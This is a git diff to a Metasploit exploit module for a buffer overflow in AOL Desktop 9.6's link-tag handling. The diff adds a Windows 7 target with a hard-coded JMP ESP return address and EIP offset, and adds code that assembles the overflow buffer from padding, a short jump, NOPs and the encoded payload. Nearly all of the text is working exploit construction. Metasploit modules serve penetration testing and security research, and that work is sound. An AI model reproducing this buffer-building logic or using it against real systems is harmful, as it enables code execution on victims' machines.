diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
index a1e15b8b72..163eb04c8b 100644
--- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
+++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
@@ -29,10 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'	     => "$Revision$",
 			'Author'         =>
 				[
-					'sup3r',     #Initial disclosure, poc (9.5)
-					'sickn3ss',  #9.6 poc
-					'sinn3r',    #Metasploit
-					'mr_me',     #NX bypass target
+					'sup3r',        #Initial disclosure, poc (9.5)
+					'sickn3ss',     #9.6 poc
+					'sinn3r',       #Metasploit
+					'mr_me',        #NX bypass target
+					'silent_dream', #Win 7 target
 				],
 			'References'     =>
 				[
@@ -60,7 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Max'   => 8000,        #Buffer max. Can be more.
 						},
 					],
-
 					[
 						'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
 						{
@@ -70,6 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Max'    => 8000,        # Buffer max. Can be more.
 						},
 					],
+					[
+						'AOL Desktop 9.6 on Windows 7',
+						{
+							'Ret'    => 0x63227D6D,  # JMP ESP in coolapi.dll
+							'Offset' => 4327,        # Offset to EIP
+							'Max'    => 8000,        # Buffer max. Can be more
+						}
+					],
 				],
 			'Privileged'	 => false,
 			'DisclosureDate' => "Jan 31 2011",
@@ -85,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
-		if target.name !~ /SP3 - NX bypass/
+		if target.name =~ /XP SP3$/
 
 			# Compatible with what the poc has, and what I see on my debugger
 			sploit  = ''
@@ -101,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			sploit << payload.encoded
 			sploit << rand_text_alpha(target['Max']-sploit.length)
 
-		else
+		elsif target.name =~ /SP3 - NX bypass$/
 
 			#Thanks mr_me for the ROP chain
 
@@ -173,6 +181,18 @@ class Metasploit3 < Msf::Exploit::Remote
 			#Padding
 			sploit << rand_text_alpha(target['Max']-sploit.length)
 
+		elsif target.name =~ /Windows 7/
+
+			#Thanks silent_dream
+
+			sploit  = ''
+			sploit << rand_text_alpha(target['Offset']-2)
+			sploit << "\xeb\x10"
+			sploit << [target.ret].pack('V')
+			sploit << make_nops(16)
+			sploit << payload.encoded
+			sploit << rand_text_alpha(target['Max'] - sploit.length)
+
 		end
 
 		link_value = rand_text_alpha(6)